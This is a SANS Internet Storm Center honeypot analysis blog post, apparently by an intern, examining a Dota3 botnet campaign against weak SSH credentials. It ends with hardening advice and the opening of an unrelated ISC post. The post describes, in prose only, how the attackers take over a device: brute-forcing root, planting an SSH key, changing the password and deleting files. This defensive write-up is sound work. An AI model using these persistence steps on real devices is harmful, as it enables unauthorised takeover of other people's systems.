As it turns out that wasn’t going to be an issue.  This newly-minted honeypot was remotely interacted with over 1,600 times from 169 distinct IP addresses on the first day; the device currently averages 17,000 probes daily.  Reviewing the honeypot logs, one of the first lessons I learned from the Internship is that there are vast differences between a single-dimension firewall log and the level of detail in the data the honeypot captures when it is probed.

The next challenge was to make some sense of the data and figure out where to begin my analysis. As I started to dig in, I used tools mentioned in recent SANS classes or in ISC diary entries. That list includes jq, Python, bash, command-line tools such as grep/egrep, sort, awk, PowerShell, some web-based JSON-to-CSV parsers [4] [5], VirusTotal [6], Joe Sandbox [7], Shodan [8], Mitre ATT&CK [9], and Microsoft Excel. I have learned how to use the tools (and a little about how not to use the tools) to analyze and understand various command sequences. Lately I have been working with Python to filter the data and isolate records of interest. That data is loaded into an Excel spreadsheet for analysis, and tables and graphs are created to help visualize the event. I can use the graphs when I create my report.

The next part of the puzzle was to figure out how to efficiently utilize those tools.  What am I looking for? What is that next question I should ask? While reviewing log data to identify an interesting set of logs to investigate I found that the ‘Five Ws’ (Who, What, When, Where, Why, How) approach [10] helped organize my investigation.  Answering those questions provided direction and led to asking more useful follow-up questions.  I found that often these ‘W’ questions will be asked in an order that will organically develop based on how each investigation unfolds.  This methodical approach is one that helps me save time and produce a better analysis of the events.  I have found that I often ‘loop back’ to re-ask earlier questions because the answer to some other question provided more clarity or insight. This analysis process is an iterative exercise.

The remainder of this blog post is largely a narrative of a recent event sequence I found in my logs.  As the events unfold in the following sections of the document, I will add some commentary about the process I followed.  I start with the ‘W’ questions, and the answers sometimes point to the next step in the process.

Who | What | When | Where | Why | How | How Long

The honeypot always receives many Telnet/SSH probes, but a series of events appeared that followed a distinct pattern. This is the identification of the incident, this is the 'what' that is happening. 

At a high level, the sequence I started investigating was: 

  1. The actor authenticates to the system with a username/password for the root account [a] [j].
  2. Several commands are executed by the actor to secure access to the device [b].
    • Remove the existing .ssh directory and contents, then create a new public key to enable certificate-based authentication [c].
    • Change the root account password to a random 12-character value [d].
    • Recursively remove the files /tmp/secure.sh [11] and /tmp/auth.sh [e].
  3. The actor launches various commands to profile the system/hardware [f].

Analyzing the command sequence can help us shed some light on the goal of the attack. For this series of events the commands used (after authenticating to the honeypot via SSH) were:



The next step (not captured by the honeypot but identified through research) would be for the actor to upload a file named dota3.tar.gz via SFTP [13]. The actor would then execute a base64-encoded command to initialize the malware. Assimilation complete [14] [e] [g] [h] [i].

Who | What | When | Where | Why | How | How Long

Since I had a fair amount of information about the command sequence, I next tried to identify the actor. I treated the key string used to replace the .ssh/authorized_keys file, placed on the system to gain persistence, as an IoC (Indicator of Compromise) [c] [12]. This IoC matched attacks attributed to the ‘Dota’ family of botnets. The Dota botnet targets IoT devices running SSH servers that use default or poorly chosen passwords. Once the actor gains access to the device, they begin to profile the system, followed by uploading and executing malware on the device to add it to the botnet [i]. The firm CounterCraft has internally labeled this actor ‘CC0631’ [13], but at the time of this writing the actual identity of the threat actor has yet to be determined.

Who | What | When | Where | Why | How | How Long

We can summarize the Why of this attack as a desire to ‘assimilate’ this device into a botnet army. Once the actor has assembled their army, we can only assume that they will use it for future (malicious but money-making) activities, such as cryptocurrency mining, DDoS attacks, spam distribution, data theft, etc. The Dota3 botnet has been linked to cryptojacking [15], deploying XMRig [16] agents to compromised systems, indicating that the purpose of the botnet is to engage in crypto mining [13].

Who | What | When | Where | Why | How | How Long

Once I had something to look for, I needed to find the ‘When’, or the period between the first and last detected instances of this attack sequence in the logs. This will help me get my arms around the data I need from the event to produce a more complete analysis. I continued to find instances of this attack sequence as I searched through older log files.  In my honeypot I was able to set the start date to 10 June 2024 and the end date to 11 August 2024 (the date I was doing my analysis; these attacks continue to this day).  This would reflect my local ‘How Long’ period as well, at least from my honeypot’s perspective.  Knowing this date range is a key detail necessary to identify the scope of the activity.

Who | What | When | Where | Why | How | How Long

The earliest mention that I can find is that this variant of the Dota botnet was detected in December of 2019 [17], but there are conflicting reports, with other sources listing an October 2021 [13] identification date. Not a conclusive answer, but in this case the How Long for this botnet’s existence could be between 3 and 5 years.

Who | What | When | Where | Why | How | How Long

The next steps are to continue analyzing the data to gain more understanding about the scope and scale of the operation and to try to identify aspects of ‘how’ the actor works. For instance, an interesting aspect of an incident is to understand whether this is a manual process or an automated one.

There are a few attributes of an attack sequence that can help with this identification, namely:

  • The Volume or rate of activity occurring in a window of time, 
  • The Geographic locations of attacking systems (analyze the involved IP addresses, locations, reuse), and 
  • The Session Time or the length of an attack session compared to the complexity of the commands.  

From my perspective, my local ‘When’ and ‘How Long’ attributes allowed me to identify activity from over 10,000 probes. The logs showed that 42% of the probes were initially unsuccessful. This activity resulted in a total of 5,873 successful SSH authentications to the honeypot that fit the same subsequent command sequence. Crunching the data (I used Python to isolate the data elements and Excel to do the math and create the graphics), the following attributes can be identified:

Volume: The volume/rate of successful authentications during the period of 10 June to 11 August (62 days) would be 5,873/62, or 94.73 incidents per day (roughly four per hour).

Another way to evaluate the event frequency is to identify how many occur during a given hour over a period of time.  Think of each hour as a bucket, and for each day add the number of attacks for that hour to that ‘bucket’.  (This type of analysis is often used to analyze network traffic to identify potential ‘beaconing’, or command and control activity.) For this attack, after 62 days the hourly event distribution graph looks like:

For example, as shown in the chart above, the peak hour across the date range was 16:00 UTC with 399 successful authentications, the ‘slowest’ hour was 22:00 UTC with 131 authentications, and the average hourly event rate approaches 245. This trend indicates a 24×7 operation.
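The hourly bucketing itself only takes a few lines of Python. This sketch assumes you have already extracted one timestamp per successful authentication from the honeypot logs (the sample values below are made up):

# Count successful authentications per hour of day across the whole date range.
from collections import Counter
from datetime import datetime

# Example timestamps only; in practice these come from the honeypot's logs.
timestamps = [
    "2024-06-10T16:02:11",
    "2024-06-10T16:45:03",
    "2024-06-11T22:13:37",
]

buckets = Counter(datetime.fromisoformat(ts).hour for ts in timestamps)

for hour in range(24):
    print(f"{hour:02d}:00 UTC -> {buckets.get(hour, 0)} authentications")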

These findings (overall rate of attack and rate of attack per hour) are indications of an automated operation.

Who | What | When | Where | Why | How | How Long

Geographic Location: Next, I worked to find the number of systems used in the probes and the countries in which they are hosted. The successful probes originated from 2,464 IP addresses in 94 different ISO codes. This is another sign of an automated operation. As listing all 2,464 distinct IP addresses in this document would not be useful, this table shows the top 20 IP addresses by number of successful authentications from each address:

The data in the table above tends to show a distributed event due to the number of IP addresses used and the geographic range (ISO codes (countries)) over which the addresses are hosted. Many of the IP addresses appear only once in my honeypot logs. This is displayed graphically in the chart below (number of IP addresses on the ‘Y’ axis vs. number of times used on the ‘X’ axis):

I mentioned earlier that the probes originated from 94 different ISO codes (countries) [18]. The table below displays the top 20 hosting countries.  The countries in this list hosted the systems responsible for 88% of all attack sessions:

Excel has many graphs to help display and convey information visually. I tried and rejected different attempts, including bar charts, line charts, and the usually reliable pie chart. I found that I could not clearly convey this information using those standard charts.  Thinking about the worldwide aspect of this dataset led me to try to figure out how to create a graph from a map.  Three minutes with a search engine [19] and another four minutes with Excel helped create this suitable-for-framing chart that helps illustrate the global nature of the attacks:

Of the 249 countries, territories, or areas of geographical interest [18] with ISO codes, 38% show up in my dataset and are highlighted in the chart above.

Session time:  The approach I took was to analyze the amount of time each attack took from the point of authentication to the end of the command sequence.  The session time is easy to calculate, but I also wanted to obtain a measure of the amount of work completed by the actor during each session. A lot of keypresses during a short amount of time would indicate that there is automation being employed. There are some practical challenges with this approach that I will call out below.

  • Session Time = Session end time – Session start time in seconds (s)   
  • Command sequence: 1103 characters (c) (13 logon + 1088 ‘command’ characters).  
  • From a worldwide perspective:
    • The average session time was 18.49s 
    • Maximum session time of 182.5s, Minimum length of 6.1s. 
    • 1103c / 18.49s per session = 59 cps (characters per second)
    • 59cps ~= 720 words per minute
  • From a US-based IP address:
    • The average session time was 14.19s 
    • Maximum session time of 112.2s, Minimum length of 6.1s
    • 1103c / 14.19s per session = 74 cps
    • 74 cps ~= 888 words per minute

In graphical form (using Excel) the difference between the US-based attacks and worldwide attacks is displayed below; you can nearly see the US average of 14.19s in the chart on the left vs the world average of 18.49s in the chart on the right as a virtual horizontal line denoting those averages in each graph:

As noted above, this process is not entirely accurate; there are external factors that impact the measurement.  For instance, the amount of time it takes for the honeypot to process and respond to the command, the processing capacity of different source devices, and the variability in the network ‘speed’ between the actor and the victim are not taken into account with this process. 

Leaving those issues aside for a moment, these results still show that the attacks were automated; the data shows the ‘typist’ was working at speeds exceeding 720 words/minute.  If the three impacting factors mentioned above are taken into account, the typing rate (in words per minute) would increase.

The findings (from a Volume, Geographic Dispersion, and Session Timing perspective) all support the conclusion that this is an automated activity. The scale of the event (number of IP addresses, number of host countries) further indicates that this is likely a botnet operated by a threat actor group; it would take more effort to collect and maintain a fleet of bots this size than one person could be expected to support.

Other interesting aspects of the event I decided to investigate are the accounts targeted, the variety in the types of passwords used to authenticate, and an analysis of the new passwords used to secure the root account. 

In this case, the event targeted the root account most often (99.5%) [j].  A small number of user accounts were targeted by the actor at a much lower rate: 

  • ‘roots’, 
  • ‘root1’, 
  • ‘root2’, 
  • ‘webroot’, and 
  • ‘root01’.

While probing the system, the actor used 1,314 unique passwords to authenticate using SSH [a]. Passwords were often reused when trying to initially authenticate; only 229 passwords were used a single time. This activity is consistent with an organized password-spray attack, using one password to try authentication against multiple targets in one ‘pass’ [k]. The password reuse graph (below) matches the general form of the IP address graph presented above; the number of reused passwords (‘Y’ axis) decreases with the number of usages (‘X’ axis):

The fourth step in the command sequence was an attempt by the actor to gain persistence on the device by changing the password of the system account to a new value.  Of the 5,873 password changes to the ‘root’ user account, 5,759 passwords were unique, re-using only 119 passwords.  The new password values had the same format; all were 12-character strings consisting of random uppercase, lowercase, and numeric characters [d].
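A quick way to confirm that the replacement passwords all follow that 12-character alphanumeric pattern is a simple regular-expression check; the sample values below are made up, the real ones come from the captured password-change commands:

# Verify that the new root passwords match the observed pattern:
# 12 characters, uppercase/lowercase letters and digits only.
import re

PATTERN = re.compile(r"[A-Za-z0-9]{12}")

# Example values only; replace with the captured password values.
new_passwords = ["Ab3dEf6hIj9k", "Zx8cVb2nMq4w", "short", "with-symbol!"]

for pw in new_passwords:
    print(pw, "matches" if PATTERN.fullmatch(pw) else "does not match")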

Attack Observation Report Generation

At this point, all ‘W’ and follow-up questions have been identified, asked, and answered, and it is time to pull all of the collected information together to produce an Attack Observation report. This report includes a summary of observations using text, tables, and graphs (actor info, IoCs, command patterns, impact, Mitre techniques [20], proposed recovery steps) as well as information about mitigating controls that could be implemented to prevent future attacks. The report content is distilled down to ‘just the facts’, as the purpose of an Attack Observation report is to be more direct and focused than a blog post.  

You may find that the process of creating an Attack Observation report will raise additional questions that must be answered to arrive at a more complete ‘picture’. This is the iterative part of the analysis process I mentioned earlier.  Lather, rinse, repeat…

For this Attack Observation report

Who? – This command pattern has been reliably attributed as belonging to the ‘Dota3’ botnet [21], and the CounterCraft company has labeled the actor ‘CC0631’ [13], but very little about this threat actor is known at this time [i]. 

What? – The Dota3 botnet targets SSH servers with weak credentials.  The goal is to compromise the system, obtain persistence, and install malware on the device for malicious activities such as crypto mining of digital currency [17] [a] [b] [c] [d] [e] [f] [g] [j] [k].

Where? – This is a global event.  5,873 successful authentications/probes over 62 days using 2,464 distinct IP addresses (systems) hosted in 94 different countries. The scope and scale of the operation indicates that this is controlled by a threat group. General botnet activity is also on the rise globally [22] [i].

When? – The events started on 10 June 2024 and data through 11 August 2024 is included in the report.  

Why? – The ‘why’ is to specifically identify weak SSH servers, gain root access, obtain persistence, and install malware.  There are indications that this activity is related to mining crypto currency (crypto jacking) [13] [23] [h] [i].

How? – Is this an automated event, or is this a one-off manual effort? To get this answer, I review the various rates of attack, identify the locations participating in the probes, and inspect the different commands used. This can help determine whether the event is automated and can also potentially shine a light on the actor. Additionally, mitigating steps can be identified to block or deflect the malicious traffic. This activity was characterized as an organized, automated attack.

How Long? – Research uncovered that the Dota3 malware variant has been active since at least October of 2021 [13]; there are reports that move that date back to as early as December of 2019 [17]. Conservatively, the variant has been active for 3 years. As of this writing, these attacks are still targeting my honeypot.

Prevention: Botnets will exist as long as the actor’s efforts:

  • are financially lucrative,
  • remain technically possible, and
  • are not derailed by incarceration.

The operation of a botnet would be affected if any one of those three items changed.

The information collected in this Attack Observation report can be used to prevent or to reduce the technical feasibility of future attacks.  

  • A list of potential controls could be compiled and provided to the company’s IT Architecture, Design, and Implementation teams to help them build preventative measures into projects.  Future systems and services will be deployed with a more secure architecture and configuration. 
  • Methods to detect a compromised device would be extremely useful as well; Security Operations staff could employ that information to identify, contain, and eradicate malicious actors from the company’s systems. 
  • Additionally, the company’s GRC (Governance, Risk, and Compliance) team can use these findings when reviewing the company’s control library, either adding new controls or ensuring that existing controls are applied where appropriate.  Future audits can be completed to help the company manage operational risk.

Conclusion:  This is a preventable attack.  Systems with strong password controls would not be susceptible to this activity.  If we were in a corporate environment, the next steps would be to:

1.    Identify security gaps.
2.    Plan to evaluate all IoT devices that are accessible from the Internet.  
3.    Log into each device.

  • If you cannot log into the device, schedule a replacement or closer inspection for the system; it may be compromised.
    • When deploying the replacement device, ensure that it is sufficiently protected from remote authentication attacks.
  • If you can log into the device, implement controls to improve the configuration hygiene and secure the device.
    • Ensure that at a minimum the passwords are unique per device and ‘strong’ enough.

4.    Repeat until complete.
5.    Report findings to the appropriate groups.
6.    Implement a practice to periodically audit these systems to ensure that any compromised devices are identified and recovery steps are taken.

In this case, there are eleven security (hygiene) controls that can be implemented to reduce IoT attacks:

1.    Do not expose unprotected IoT devices to the Internet. If it isn’t accessible, it can’t be assimilated.
2.    Implement IoT devices behind a bastion host [24] or a firewall.
3.    Restrict logon access to known IP addresses, ports, and protocols with filtering rules on the firewall or router.
4.    Implement VPN access to your systems with strong passphrases and multifactor authentication.
5.    Ensure that IoT systems are patched and software is up to date [25].
6.    Ensure that the device has a secure configuration.
7.    Do not allow privileged accounts (i.e., root) to have SSH access.
8.    Do not use simple passphrases for SSH authentication; utilize public/private authentication keys with a passphrase.
9.    Ensure that passphrases are long and are strong (comprised of (at least seemingly) random characters).
10.    Do not re-use passwords across devices.
11.    Monitor IoT devices.

Summary

It is now time to close a loop and explain the title of this article (“Hygiene, Hygiene, Hygiene”). 

The old joke “What are the three most important things to know about real estate? Answer:  Location, Location, Location!” could be modified and applied to this situation: “What are the three most important steps to take to protect my systems? The answer to that question is: Hygiene, Hygiene, Hygiene!”.  The new joke works as well as the original; the ‘corniness’ is maintained and the answer provides a hint of the solution.  

In a perfect world, the ‘Hygiene’ process begins with a threat assessment, the results of which are integrated into project planning and design phases.  Pilot systems are built and tested, issues are identified and solutions are fed back into the design process. During the deployment phase of the project tests are performed and systems are monitored to ensure that the product remains true to the plan.  After deployment is complete, the operational system is periodically subjected to monitoring, auditing, testing, and adjustments are made as necessary.  This approach is difficult, takes time, and increases project cost, which are all reasons our systems are vulnerable to botnets today.

Since we are rarely in that perfect world, we often must circle back and apply hardening (hygiene) changes to in-production systems.  This process is neither inexpensive nor easy, but if even a few improvements can be made, the system will be less likely to be compromised.

There is a relationship between the answer to that original joke (i.e., ‘Location’) and a concern I had related to satisfying the requirements of the ISC Internship. I was concerned that the Internet that serviced my little corner of the world was somehow as secluded as it was geographically, which would make it difficult to complete the assignments. That has not been the case. Another valuable lesson from this experience is that there are no hidden corners of the Internet. In real life, newly connected devices are discovered within a few minutes, and poorly protected systems (i.e., low-hanging fruit) are often compromised a few minutes later. 

The ISC Internship is an intensive experience. In the end, as with any meaningful undertaking, you get out of it what you put into it. I have learned a lot about configuration hygiene, IoT weaknesses, data analysis, and tool development/scripting, and I have a deeper appreciation for the work that goes into analyzing an incident and creating an attack observation report.  I can’t think of a better way to gain this experience; this Internship provides an opportunity to roll up your sleeves and dig in.

Identified Mitre ATT&CK Techniques

[a] Mitre ATT&CK: Brute Force.Password Guessing (T1110.001) – Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. [23]
[b] Mitre ATT&CK: Command and Scripting.Unix Shell (T1059.004) – Adversaries may abuse Unix shell commands and scripts for execution. [23]
[c] Mitre ATT&CK: Account Manipulation.SSH Authorized Keys (T1098.004) – Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. [23]
[d] Mitre ATT&CK: Account Manipulation (T1098) – Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. [23]
[e] Mitre ATT&CK: Indicator Removal. File Deletion (T1070.004) – Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. [23]
[f] Mitre ATT&CK: System Information Discovery (T1082) – An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. [23]
[g] Mitre ATT&CK: System Service Discovery (T1007) – Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start. [23]
[h] Mitre ATT&CK: Resource Hijacking (T1496) – Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. [23]
[i] Mitre ATT&CK: Compromise Infrastructure.Botnet (T1584.008) – Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not Initial Access to that environment — instead leveraging these devices to support additional targeting. [23]
[j] Mitre ATT&CK: Valid Accounts.Local Accounts (T1078.003) – Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. [23]
[k] Mitre ATT&CK: Brute Force.Password Spraying (T1110.003) – Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. [23]

[1] sans.edu Internet Storm Center – SANS Internet Storm Center
[2] Rumsfeld Matrix (theuncertaintyproject.org)
[3] Submit Your Firewall Logs – SANS Internet Storm Center
[4] JSON To CSV Converter (convertcsv.com)
[5] JSON to CSV – CSVJSON
[6] VirusTotal – Home
[7] Joe Sandbox
[8] Shodan Search Engine
[9] Mitre ATT&CK
[10] Five Ws – Wikipedia
[11] secure linux/secure.sh
[12] VirusTotal – File
[13] Dota3 Malware Again and Again | CounterCraft (countercraftsec.com)
[14] Assimilation | Memory Alpha | Fandom
[15] Cryptojacking – What is it, and how does it work? | Malwarebytes
[16] XMRig
[17] Dota3: Is your Internet of Things device moonlighting? | Official Juniper Networks Blogs
[18] List of ISO 3166 country codes – Wikipedia
[19] Create a Map chart in Excel – Microsoft Support
[20] Tactics – Enterprise | MITRE ATT&CK®
[21] blog.port22.dk
[22] 15+ Shocking Botnet Statistics and Facts for 2024 (comparitech.com)
[23] Global Threat Intelligence Report April (blackberry.com)
[24] Bastion host – Wikipedia
[25] A Look Back at the Top 12 IoT Exploits of 2021 (Part 1) (finitestate.io)
[26] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Python Libraries Used for Malicious Purposes, (Wed, Sep 11th)

This post was originally published on this site

Since I’m interested in malicious Python scripts, I found multiple samples that rely on existing libraries. The best-known repository is probably pypi.org[1], which, as of today, reports 567,478 projects! Malware developers are like regular developers: they don’t want to reinvent the wheel, so they shop around existing libraries to expand their scripts’ capabilities.